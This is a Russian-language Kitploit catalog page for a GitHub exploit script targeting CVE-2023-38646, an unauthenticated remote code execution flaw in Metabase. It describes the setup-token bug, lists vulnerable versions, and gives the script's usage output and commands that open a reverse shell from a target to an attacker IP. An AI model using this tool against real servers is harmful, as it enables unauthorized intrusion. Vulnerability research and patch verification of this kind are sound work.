Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/ego1stoo/cve-2023-38646
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubego1stoo/cve-2023-38646

CVE-2023-38646

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

12 лет назадЕщё не проверено

Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

Поделиться

CVE-2023-38646 Metabase RCE без аутентификации (11/26/2023)

Metabase с открытым исходным кодом до версии 0.46.6.1 и Metabase Enterprise до версии 1.46.6.1 позволяют злоумышленникам выполнять произвольные команды на сервере с привилегиями сервера. Для эксплуатации аутентификация не требуется. Другие исправленные версии: 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 и 1.43.7.2.

Уязвимость заключается в том, что приложение предоставляет setup-token, который можно использовать для проверки базы данных в api/setup/validate. Неавторизованный пользователь может создать вредоносный код и выполнить произвольную команду.

Отказ от ответственности

ИСПОЛЬЗУЙТЕ НА СВОЙ СТРАХ И РИСК

Этот скрипт предоставлен для образовательных и тестовых целей. Автор не несет ответственности за любое неправомерное использование или ущерб, вызванный его использованием. Обеспечьте соблюдение применимых законов и этических норм. Используя этот скрипт, вы признаете и принимаете эти условия.

Metabase

Metabase — это инструмент бизнес-аналитики с открытым исходным кодом, который позволяет создавать диаграммы и дашборды на основе данных из различных баз данных и источников данных. Это популярный проект с более чем 33 000 звезд на GitHub, который в последние годы подвергался значительному анализу с точки зрения исследования уязвимостей.

Подтверждение концепции

Команды

root@kitploit:~
usage: CVE-2023-38646.py [-h] -rh REMOTE_HOST [-rp [REMOTE_PORT]] -p PORT -l LOCAL_HOST

options:
  -h, --help            show this help message and exit
  -rh REMOTE_HOST, --remote-host REMOTE_HOST
                        Hostname of the target.
  -rp [REMOTE_PORT], --remote-port [REMOTE_PORT]
                        Port of the Target Machine (default: Port 80)
  -p PORT, --port PORT  Port for reverse shell.
  -l LOCAL_HOST, --local-host LOCAL_HOST
                        Your IP Adress

Вы можете запустить скрипт с помощью этой команды ниже. Вы можете изменить удаленный порт с помощью -rp. Порт по умолчанию — 80.

root@kitploit:~
./CVE-2023-38646.py -rh <Target-IP> -p <revese-shell port> -l <Attacker IP>
root@kitploit:~
python3 CVE-2023-38646.py -rh <Target-IP> -p <revese-shell port> -l <Attacker IP>

изображение

Уязвимые версии

root@kitploit:~
Metabase Enterprise 1.46 < 1.46.6.1
Metabase Enterprise 1.45 < 1.45.4.1
Metabase Enterprise 1.44 < 1.44.7.1
Metabase Enterprise 1.43 < 1.43.7.2
Metabase open source 0.46 < 0.46.6.1
Metabase open source 0.45 < v0.45.4.1
Metabase open source 0.44 < 0.44.7.1
Metabase open source 0.43 < 0.43.7.2

Ссылки

  • Packet storm security: Удаленное выполнение кода в Metabase
  • NVD CVE-2023-38646 Подробности
Скачать инструмент